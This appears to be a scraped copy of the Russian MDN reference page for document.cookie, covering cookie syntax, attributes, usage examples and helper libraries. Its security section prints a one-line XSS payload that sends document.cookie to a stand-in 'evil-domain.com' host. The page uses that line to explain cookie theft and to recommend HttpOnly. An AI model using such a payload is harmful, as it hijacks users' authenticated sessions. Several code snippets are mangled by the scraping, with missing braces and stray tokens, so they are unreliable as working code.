Cookie куки и javascript что это

Document.cookie

Статья описывает получение и установку cookies связанных с текущим документом. Общая библиотека для работы с cookies смотри simple cookie framework.

Синтаксис

Чтение всех cookies, связанных с текущим документом

allCookies = document.cookie;

In the code above allCookies is a string containing a semicolon-separated list of all cookies (i.e. key=value pairs). Note that each key and value may be surrounded by whitespace (space and tab characters): in fact RFC 6265 mandates a single space after each semicolon, but some user agents may not abide by this.

Запись новой cookie

document.cookie = newCookie;

В приведённом коде newCookie — строка в виде key=value . Заметьте, у вас есть возможность установить/обновить лишь одну связку key=value за один раз, используя этот метод. Стоит отметить, что:

Any of the following cookie attribute values can optionally follow the key-value pair, specifying the cookie to set/update, and preceded by a semi-colon separator:
;path=path (e.g., ‘ / ‘, ‘ /mydir ‘) If not specified, defaults to the current path of the current document location.

Примечание: Prior to Gecko 6.0, paths with quotes were treated as if the quotes were part of the string, instead of as if they were delimiters surrounding the actual path string. This has been fixed.

Предупреждение: When user privacy is a concern, It is important that any web app implementation will invalidate cookie data after a certain timeout and won’t rely on the browser clearing session cookies One of the most beloved features of Firefox prevents session cookies from ever expiring. The same issue is also occuring with google chrome (and probably with other browsers offering similar features)

• See Date.toUTCString() for help formatting this value.
• The strict value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link.
• The lax value will only send cookies for TOP LEVEL navigation GET requests. This is sufficient for user tracking, but it will prevent many CSRF attacks.
• __Secure- Signals to the browser that it should only include the cookie in requests transmitted over a secure channel.
• __Host- Signals to the browser that in addition to the restriction to only use the cookie from a secure origin, the scope of the cookie is limited to a path attribute passed down by the server. If the server omits the path attribute the «directory» of the request URI is used. It also signals that the domain attribute must not be present, which prevents the cookie from being sent to other domains. For Chrome the path attribute must always be the origin.

Примечание: The dash is considered part of the prefix.

Примечание: These flags are only setable with the secure attribute.

Примечание: As you can see from the code above, document.cookie is an accessor property with native setter and getter functions, and consequently is not a data property with a value: what you write is not the same as what you read, everything is always mediated by the JavaScript interpreter.

Примеры

Пример #1: Простое использование

.cookie = "name=oeschger"; document.cookie = "favorite_food=tripe"; function alertCookie()  alert(document.cookie); > 

button onclick="alertCookie()">Show cookiesbutton> 

Пример #2: Получить cookie с именем test2

.cookie = "test1=Hello"; document.cookie = "test2=World"; var cookieValue = document.cookie.replace(/(?:(?:^|.*;\s*)test2\s*\=\s*([^;]*).*$)|^.*$/, "$1"); function alertCookieValue()  alert(cookieValue); > 

button onclick="alertCookieValue()">Show cookie valuebutton> 

Пример #3: Выполнить операцию единожды

При использовании следующего кода замените все вхождения doSomethingOnlyOnce (наименование cookie) на другое имя.

function doOnce()  if (document.cookie.replace(/(?:(?:^|.*;\s*)doSomethingOnlyOnce\s*\=\s*([^;]*).*$)|^.*$/, "$1") !== "true")  alert("Do something here!"); document.cookie = "doSomethingOnlyOnce=true; expires=Fri, 31 Dec 9999 23:59:59 GMT"; > > 

button onclick="doOnce()">Only do something oncebutton> 

Пример #4: Перезагрузить cookie

function resetOnce()  document.cookie = "doSomethingOnlyOnce=; expires=Thu, 01 Jan 1970 00:00:00 GMT"; > 

button onclick="resetOnce()">Reset only once cookiebutton> 

Example #5: Проверить существование cookie

//ES5 if (document.cookie.split(‘;’).filter(function(item) < return item.trim().indexOf('reader=') == 0 >).length) < console.log('The cookie "reader" exists (ES5)') >//ES2016 if (document.cookie.split(‘;’).filter((item) => item.trim().startsWith(‘reader=’)).length)

Example #6: Проверить, что cookie имеет определённое значение

//ES5 if (document.cookie.split(‘;’).filter(function(item) < return item.indexOf('reader=1') >= 0 >).length) < console.log('The cookie "reader" has "1" for value') >//ES2016 if (document.cookie.split(‘;’).filter((item) => item.includes(‘reader=1’)).length)

Безопасность

It is important to note that the path attribute does not protect against unauthorized reading of the cookie from a different path. It can be easily bypassed using the DOM, for example by creating a hidden iframe (en-US) element with the path of the cookie, then accessing this iframe’s contentDocument.cookie property. The only way to protect the cookie is by using a different domain or subdomain, due to the same origin policy (en-US) .

Cookies are often used in web application to identify a user and their authenticated session. So stealing cookie from a web application, will lead to hijacking the authenticated user’s session. Common ways to steal cookies include using Social Engineering or by exploiting an XSS vulnerability in the application —

(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie token operator">+ document.cookie; 

The HTTPOnly cookie attribute can help to mitigate this attack by preventing access to cookie value through Javascript. Read more about Cookies and Security.

Примечания

• Starting with Firefox 2, a better mechanism for client-side storage is available — WHATWG DOM Storage (en-US).
• You can delete a cookie by simply updating its expiration time to zero.
• Keep in mind that the more you have cookies the more data will be transferred between the server and the client for each request. This will make each request slower. It is highly recommended for you to use WHATWG DOM Storage (en-US) if you are going to keep «client-only» data.
• RFC 2965 (Section 5.3, «Implementation Limits») specifies that there should be no maximum length of a cookie’s key or value size, and encourages implementations to support arbitrarily large cookies. Each browser’s implementation maximum will necessarily be different, so consult individual browser documentation.

The reason of the syntax of the document.cookie accessor property is due to the client-server nature of cookies, which differs from other client-client storage methods (like, for instance, localStorage (en-US) ):

The server tells the client to store a cookie

HTTP/1.0 200 OK Content-type: text/html Set-Cookie: cookie_name1=cookie_value1 Set-Cookie: cookie_name2=cookie_value2; expires=Sun, 16 Jul 3567 06:23:41 GMT [content of the page here]

The client sends back to the server its cookies previously stored

GET /sample_page.html HTTP/1.1 Host: www.example.org Cookie: cookie_name1=cookie_value1; cookie_name2=cookie_value2 Accept: */*

Использование относительных ссылок в параметре path

The path parameter of a new cookie can accept only absolute paths. If you want to use relative paths, therefore, you need to convert them. The following function can translate relative paths to absolute paths. It is a general-purpose function, but can be of course successifully used for the path parameter of a new cookie, as well.

Library

/*\ |*| |*| :: Translate relative paths to absolute paths :: |*| |*| https://developer.mozilla.org/ru/docs/Web/API/document.cookie |*| https://developer.mozilla.org/User:fusionchess |*| |*| The following code is released under the GNU Public License, version 3 or later. |*| http://www.gnu.org/licenses/gpl-3.0-standalone.html |*| \*/ function relPathToAbs (sRelPath)  var nUpLn, sDir = "", sPath = location.pathname.replace(/[^\/]*$/, sRelPath.replace(/(\/|^)(?:\.?\/+)+/g, "$1")); for (var nEnd, nStart = 0; nEnd = sPath.indexOf("/../", nStart), nEnd > -1; nStart = nEnd + nUpLn)  nUpLn = /^\/(?:\.\.\/)*/.exec(sPath.slice(nEnd))[0].length; sDir = (sDir + sPath.substring(nStart, nEnd)).replace(new RegExp("(?:\\\/+[^\\\/]*) + ((nUpLn - 1) / 3) + ">$"), "/"); > return sDir + sPath.substr(nStart); > 

Sample usage

/* Let us be in /ru/docs/Web/API/document.cookie */ alert(location.pathname); // displays: /ru/docs/Web/API/document.cookie alert(relPathToAbs("./")); // displays: /ru/docs/Web/API/ alert(relPathToAbs("../Guide/API/DOM/Storage")); // displays: /ru/docs/Web/Guide/API/DOM/Storage alert(relPathToAbs("../../Firefox")); // displays: /ru/docs/Firefox alert(relPathToAbs("../Guide/././API/../../../Firefox")); // displays: /ru/docs/Firefox 

Относительный срок годности cookie: числовые примеры

If you don’t want to use an absolute date for the end parameter, here you can find some numeric examples of expiration-dates relative to the moment of storage of the cookie:

.setItem("mycookie1", "myvalue1", 864e2, "/"); // this cookie will expire in one DAY docCookies.setItem("mycookie2", "myvalue2", 6048e2, "/"); // this cookie will expire in one WEEK docCookies.setItem("mycookie3", "myvalue3", 2592e3, "/"); // this cookie will expire in one MONTH (30 days) docCookies.setItem("mycookie4", "myvalue4", 31536e3, "/"); // this cookie will expire in one YEAR 

Другие примеры

Example #5: Do something only once – a general library

Библиотека

function executeOnce () < var argc = arguments.length, bImplGlob = typeof arguments[argc - 1] === "string"; if (bImplGlob) < argc++; >if (argc < 3) < throw new TypeError("executeOnce - not enough arguments"); >var fExec = arguments[0], sKey = arguments[argc - 2]; if (typeof fExec !== "function") < throw new TypeError("executeOnce - first argument must be a function"); >if (!sKey || /^(?:expires|max\-age|path|domain|secure)$/i.test(sKey)) < throw new TypeError("executeOnce - invalid identifier"); >if (decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*" + encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=\\s*([^;]*).*$)|^.*$"), "$1")) === "1") < return false; >fExec.apply(argc > 3 ? arguments[1] : null, argc > 4 ? Array.prototype.slice.call(arguments, 2, argc - 2) : []); document.cookie = encodeURIComponent(sKey) + "=1; expires=Fri, 31 Dec 9999 23:59:59 GMT" + (bImplGlob || !arguments[argc - 1] ? "; path=/" : ""); return true; >

Синтаксис

executeOnce(callback[, thisObject[, argumentToPass1[, argumentToPass2[, …[, argumentToPassN]]]]], identifier[, onlyHere])

Описание

Executes a function only once, even after the refresh of the page.

Параметры

The function to be executed (function).

argumentToPass1, argumentToPass2, argumentToPassN Optional

The arguments of the callback function.

The identifier to check, i.e. the name of the cookie (string)

A boolean expressing whether the cookie will use the local path ( true ) instead of the global one ( false or undefined ) (boolean or undefined )

Примеры использования

function alertSomething (sMsg) < alert(sMsg); >executeOnce(alertSomething, null, "Hello world. ", "alert_something");

Спецификации

Браузерная поддержка

BCD tables only load in the browser

Смотрите также

Found a content problem with this page?

This page was last modified on 17 июл. 2023 г. by MDN contributors.

Your blueprint for a better internet.

MDN

Support

Our communities

Developers

Visit Mozilla Corporation’s not-for-profit parent, the Mozilla Foundation.
Portions of this content are ©1998– 2023 by individual mozilla.org contributors. Content available under a Creative Commons license.

Источник

Читайте также:  Compress my css file